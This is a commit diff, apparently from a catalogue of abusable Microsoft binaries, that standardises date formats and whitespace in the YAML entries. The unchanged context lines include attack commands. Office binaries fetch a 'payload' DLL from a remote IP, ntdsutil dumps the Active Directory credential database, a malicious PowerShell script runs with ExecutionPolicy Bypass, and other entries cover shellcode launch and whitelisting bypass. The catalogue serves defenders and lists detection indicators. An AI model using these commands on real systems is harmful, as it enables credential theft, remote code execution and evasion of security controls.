Standardise date formats (see https://yaml.org/type/timestamp.html)

yml/OtherMSBinaries/Agentexecutor.yml

@@ -2,7 +2,7 @@
 Name: AgentExecutor.exe
 Description: Intune Management Extension included on Intune Managed Devices
 Author: 'Eleftherios Panos'
-Created: '23/07/2020'
+Created: 2020-07-23
 Commands:
   - Command: AgentExecutor.exe -powershell "c:\temp\malicious.ps1" "c:\temp\test.log" "c:\temp\test1.log" "c:\temp\test2.log" 60000 "C:\Windows\SysWOW64\WindowsPowerShell\v1.0" 0 1
     Description: Spawns powershell.exe and executes a provided powershell script with ExecutionPolicy Bypass argument
@@ -22,12 +22,12 @@ Commands:
     OperatingSystem: Windows 10
 Full_Path:
   - Path: C:\Program Files (x86)\Microsoft Intune Management Extension
-Code_Sample: 
+Code_Sample:
   - Code:
-Detection: 
+Detection:
   - IOC:
 Resources:
-  - Link: 
+  - Link:
 Acknowledgement:
   - Person: Eleftherios Panos
     Handle: '@lefterispan'

yml/OtherMSBinaries/Appvlp.yml

@@ -1,8 +1,8 @@
 ---
 Name: Appvlp.exe
-Description: Application Virtualization Utility Included with Microsoft Office 2016 
+Description: Application Virtualization Utility Included with Microsoft Office 2016
 Author: ''
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
   - Command: AppVLP.exe \\webdav\calc.bat
     Usecase: Execution of BAT file hosted on Webdav server.

yml/OtherMSBinaries/Bginfo.yml

@@ -2,7 +2,7 @@
 Name: Bginfo.exe
 Description: Background Information Utility included with SysInternals Suite
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
   - Command: bginfo.exe bginfo.bgi /popup /nolicprompt
     Description: Execute VBscript code that is referenced within the bginfo.bgi file.

yml/OtherMSBinaries/Cdb.yml

@@ -2,7 +2,7 @@
 Name: Cdb.exe
 Description: Debugging tool included with Windows Debugging Tools.
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
   - Command: cdb.exe -cf x64_calc.wds -o notepad.exe
     Description: Launch 64-bit shellcode from the x64_calc.wds file using cdb.exe.
@@ -26,4 +26,4 @@ Resources:
 Acknoledgement:
   - Person: Matt Graeber
     Handle: '@mattifestation'
----
+---

yml/OtherMSBinaries/Csi.yml

@@ -2,7 +2,7 @@
 Name: csi.exe
 Description: Command line interface included with Visual Studio.
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
   - Command: csi.exe file
     Description: Use csi.exe to run unsigned C# code.

yml/OtherMSBinaries/DefaultPack.yml

@@ -2,7 +2,7 @@
 Name: DefaultPack.EXE
 Description: This binary can be downloaded along side multiple software downloads on the microsoft website. It gets downloaded when the user forgets to uncheck the option to set Bing as the default search provider.
 Author: '@checkymander'
-Created: '2020-10-01'
+Created: 2020-10-01
 Commands:
   - Command: DefaultPack.EXE /C:"process.exe args"
     Description: Use DefaultPack.EXE to execute arbitrary binaries, with added argument support.
@@ -14,9 +14,9 @@ Commands:
     OperatingSystem: Windows
 Full_Path:
   - Path: C:\Program Files (x86)\Microsoft\DefaultPack\
-Code_Sample: 
+Code_Sample:
   - Code:
-Detection: 
+Detection:
   - IOC: DefaultPack.EXE spawned an unknown process
 Resources:
   - Link: https://twitter.com/checkymander/status/1311509470275604480.

yml/OtherMSBinaries/Devtoolslauncher.yml

@@ -2,7 +2,7 @@
 Name: Devtoolslauncher.exe
 Description: Binary will execute specified binary. Part of VS/VScode installation.
 Author: 'felamos'
-Created: '2019-10-04'
+Created: 2019-10-04
 Commands:
   - Command: devtoolslauncher.exe LaunchForDeploy [PATH_TO_BIN] "argument here" test
     Description: The above binary will execute other binary.
@@ -24,7 +24,7 @@ Full_Path:
   - Path: 'c:\windows\system32\devtoolslauncher.exe'
 Code_Sample:
   - Code:
-Detection: 
+Detection:
   - IOC: DeveloperToolsSvc.exe spawned an unknown process
 Resources:
   - Link: https://twitter.com/_felamos/status/1179811992841797632

yml/OtherMSBinaries/Dnx.yml

@@ -2,7 +2,7 @@
 Name: dnx.exe
 Description: .Net Execution environment file included with .Net.
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
   - Command: dnx.exe consoleapp
     Description: Execute C# code located in the consoleapp folder via 'Program.cs' and 'Project.json' (Note - Requires dependencies)
@@ -23,4 +23,4 @@ Resources:
 Acknowledgement:
   - Person: Matt Nelson
     Handle: '@enigma0x3'
----
+---

yml/OtherMSBinaries/Dotnet.yml

@@ -2,7 +2,7 @@
 Name: Dotnet.exe
 Description: dotnet.exe comes with .NET Framework
 Author: 'felamos'
-Created: '2019-11-12'
+Created: 2019-11-12
 Commands:
   - Command: dotnet.exe [PATH_TO_DLL]
     Description: dotnet.exe will execute any dll even if applocker is enabled.
@@ -28,7 +28,7 @@ Commands:
     OperatingSystem: Windows 10 with .NET Core installed
 Full_Path:
   - Path: 'C:\Program Files\dotnet\dotnet.exe'
-Detection: 
+Detection:
   - IOC: dotnet.exe spawned an unknown process
 Resources:
   - Link: https://twitter.com/_felamos/status/1204705548668555264
@@ -38,5 +38,5 @@ Acknowledgement:
   - Person: felamos
     Handle: '@_felamos'
   - Person: Jimmy
-    Handle: '@bohops'  
+    Handle: '@bohops'
 ---

yml/OtherMSBinaries/Dxcap.yml

@@ -1,8 +1,8 @@
 ---
 Name: Dxcap.exe
-Description: DirectX diagnostics/debugger included with Visual Studio. 
+Description: DirectX diagnostics/debugger included with Visual Studio.
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
   - Command: Dxcap.exe -c C:\Windows\System32\notepad.exe
     Description: Launch notepad as a subprocess of Dxcap.exe
@@ -24,4 +24,4 @@ Resources:
 Acknowledgement:
   - Person: Matt harr0ey
     Handle: '@harr0ey'
----
+---

yml/OtherMSBinaries/Excel.yml

@@ -2,7 +2,7 @@
 Name: Excel.exe
 Description: Microsoft Office binary
 Author: 'Reegun J (OCBC Bank)'
-Created: '2019-07-19'
+Created: 2019-07-19
 Commands:
   - Command: Excel.exe http://192.168.1.10/TeamsAddinLoader.dll
     Description: Downloads payload from remote server
@@ -38,4 +38,4 @@ Resources:
 Acknowledgement:
   - Person: 'Reegun J (OCBC Bank)'
     Handle: '@reegun21'
----
+---

yml/OtherMSBinaries/Mftrace.yml

@@ -2,7 +2,7 @@
 Name: Mftrace.exe
 Description: Trace log generation tool for Media Foundation Tools.
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
   - Command: Mftrace.exe cmd.exe
     Description: Launch cmd.exe as a subprocess of Mftrace.exe.

yml/OtherMSBinaries/Msdeploy.yml

@@ -2,7 +2,7 @@
 Name: Msdeploy.exe
 Description: Microsoft tool used to deploy Web Applications.
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
   - Command: msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand="c:\temp\calc.bat"
     Description: Launch calc.bat via msdeploy.exe.

yml/OtherMSBinaries/Msxsl.yml

@@ -2,7 +2,7 @@
 Name: msxsl.exe
 Description: Command line utility used to perform XSL transformations.
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
   - Command: msxsl.exe customers.xml script.xsl
     Description: Run COM Scriptlet code within the script.xsl file (local).

yml/OtherMSBinaries/Ntdsutil.yml

@@ -2,7 +2,7 @@
 Name: ntdsutil.exe
 Description: Command line utility used to export Actove Directory.
 Author: 'Tony Lambert'
-Created: '2020-01-10'
+Created: 2020-01-10
 Commands:
   - Command: ntdsutil.exe "ac i ntds" "ifm" "create full c:\" q q
     Description: Dump NTDS.dit into folder
@@ -23,4 +23,4 @@ Resources:
 Acknowledgement:
   - Person: Sean Metcalf
     Handle: '@PyroTek3'
----
+---

yml/OtherMSBinaries/Powerpnt.yml

@@ -2,7 +2,7 @@
 Name: Powerpnt.exe
 Description: Microsoft Office binary.
 Author: 'Reegun J (OCBC Bank)'
-Created: '2019-07-19'
+Created: 2019-07-19
 Commands:
   - Command: Powerpnt.exe "http://192.168.1.10/TeamsAddinLoader.dll"
     Description: Downloads payload from remote server
@@ -34,4 +34,4 @@ Resources:
 Acknowledgement:
   - Person: Reegun J (OCBC Bank)
     Handle: '@reegun21'
----
+---

yml/OtherMSBinaries/Rcsi.yml

@@ -2,7 +2,7 @@
 Name: rcsi.exe
 Description: Non-Interactive command line inerface included with Visual Studio.
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
   - Command: rcsi.exe bypass.csx
     Description: Use embedded C# within the csx script to execute the code.

yml/OtherMSBinaries/Sqldumper.yml

@@ -2,7 +2,7 @@
 Name: Sqldumper.exe
 Description: Debugging utility included with Microsoft SQL.
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
   - Command: sqldumper.exe 464 0 0x0110
     Description: Dump process by PID and create a dump file (Appears to create a dump file called SQLDmprXXXX.mdmp).

yml/OtherMSBinaries/Sqlps.yml

@@ -2,7 +2,7 @@
 Name: Sqlps.exe
 Description: Tool included with Microsoft SQL Server that loads SQL Server cmdlets. Microsoft SQL Server\100 and 110 are Powershell v2. Microsoft SQL Server\120 and 130 are Powershell version 4. Replaced by SQLToolsPS.exe in SQL Server 2016, but will be included with installation for compatability reasons.
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
   - Command: Sqlps.exe -noprofile
     Description: Run a SQL Server PowerShell mini-console without Module and ScriptBlock Logging.

yml/OtherMSBinaries/Sqltoolsps.yml

@@ -2,7 +2,7 @@
 Name: SQLToolsPS.exe
 Description: Tool included with Microsoft SQL that loads SQL Server cmdlts. A replacement for sqlps.exe. Successor to sqlps.exe in SQL Server 2016+.
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
   - Command: SQLToolsPS.exe -noprofile -command Start-Process calc.exe
     Description: Run a SQL Server PowerShell mini-console without Module and ScriptBlock Logging.
@@ -24,4 +24,4 @@ Resources:
 Acknowledgement:
   - Person: Pierre-Alexandre Braeken
     Handle: '@pabraeken'
----
+---

yml/OtherMSBinaries/Squirrel.yml

@@ -2,14 +2,14 @@
 Name: Squirrel.exe
 Description: Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation.
 Author: 'Reegun J (OCBC Bank) - @reegun21'
-Created: '2019-06-26'
+Created: 2019-06-26
 Commands:
   - Command: squirrel.exe --download [url to package]
     Description: The above binary will go to url and look for RELEASES file and download the nuget package.
     Usecase: Download binary
     Category: Download
     Privileges: User
-    MitreID: T1218 
+    MitreID: T1218
     MitreLink: https://attack.mitre.org/techniques/T1218/
     OperatingSystem: Windows 7 and up with Microsoft Teams installed
   - Command: squirrel.exe --update [url to package]
@@ -46,9 +46,9 @@ Commands:
     OperatingSystem: Windows 7 and up with Microsoft Teams installed
 Full_Path:
   - Path: '%localappdata%\Microsoft\Teams\current\Squirrel.exe'
-Code_Sample: 
+Code_Sample:
   - Code: https://github.com/jreegun/POC-s/tree/master/nuget-squirrel
-Detection: 
+Detection:
   - IOC: Update.exe spawned an unknown process
 Resources:
   - Link: https://www.youtube.com/watch?v=rOP3hnkj7ls

yml/OtherMSBinaries/Te.yml

@@ -2,7 +2,7 @@
 Name: te.exe
 Description: Testing tool included with Microsoft Test Authoring and Execution Framework (TAEF).
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
   - Command: te.exe bypass.wsc
     Description: Run COM Scriptlets (e.g. VBScript) by calling a Windows Script Component (WSC) file.

yml/OtherMSBinaries/Tracker.yml

@@ -2,7 +2,7 @@
 Name: Tracker.exe
 Description: Tool included with Microsoft .Net Framework.
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
   - Command: Tracker.exe /d .\calc.dll /c C:\Windows\write.exe
     Description: Use tracker.exe to proxy execution of an arbitrary DLL into another process. Since tracker.exe is also signed it can be used to bypass application whitelisting solutions.

yml/OtherMSBinaries/Update.yml

@@ -2,14 +2,14 @@
 Name: Update.exe
 Description: Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation.
 Author: 'Oddvar Moe'
-Created: '2019-06-26'
+Created: 2019-06-26
 Commands:
   - Command: Update.exe --download [url to package]
     Description: The above binary will go to url and look for RELEASES file and download the nuget package.
     Usecase: Download binary
     Category: Download
     Privileges: User
-    MitreID: T1218 
+    MitreID: T1218
     MitreLink: https://attack.mitre.org/techniques/T1218/
     OperatingSystem: Windows 7 and up with Microsoft Teams installed
   - Command: Update.exe --update=[url to package]
@@ -94,9 +94,9 @@ Commands:
     OperatingSystem: Windows 7 and up with Microsoft Teams installed
 Full_Path:
   - Path: '%localappdata%\Microsoft\Teams\update.exe'
-Code_Sample: 
+Code_Sample:
   - Code: https://github.com/jreegun/POC-s/tree/master/nuget-squirrel
-Detection: 
+Detection:
   - IOC: Update.exe spawned an unknown process
 Resources:
   - Link: https://www.youtube.com/watch?v=rOP3hnkj7ls

yml/OtherMSBinaries/Vsjitdebugger.yml

@@ -2,7 +2,7 @@
 Name: vsjitdebugger.exe
 Description: Just-In-Time (JIT) debugger included with Visual Studio
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
   - Command: Vsjitdebugger.exe calc.exe
     Description: Executes calc.exe as a subprocess of Vsjitdebugger.exe.
@@ -17,7 +17,7 @@ Full_Path:
 Code_Sample:
   - Code:
 Detection:
-  - IOC: 
+  - IOC:
 Resources:
   - Link: https://twitter.com/pabraeken/status/990758590020452353
 Acknowledgement:

yml/OtherMSBinaries/Winword.yml

@@ -2,7 +2,7 @@
 Name: Winword.exe
 Description: Microsoft Office binary
 Author: 'Reegun J (OCBC Bank)'
-Created: '2019-07-19'
+Created: 2019-07-19
 Commands:
   - Command: winword.exe "http://192.168.1.10/TeamsAddinLoader.dll"
     Description: Downloads payload from remote server
@@ -38,4 +38,4 @@ Resources:
 Acknowledgement:
   - Person: 'Reegun J (OCBC Bank)'
     Handle: '@reegun21'
----
+---

yml/OtherMSBinaries/Wsl.yml

@@ -2,7 +2,7 @@
 Name: Wsl.exe
 Description: Windows subsystem for Linux executable
 Author: 'Matthew Brown'
-Created: '2019-06-27'
+Created: 2019-06-27
 Commands:
   - Command: wsl.exe -e /mnt/c/Windows/System32/calc.exe
     Description: Executes calc.exe from wsl.exe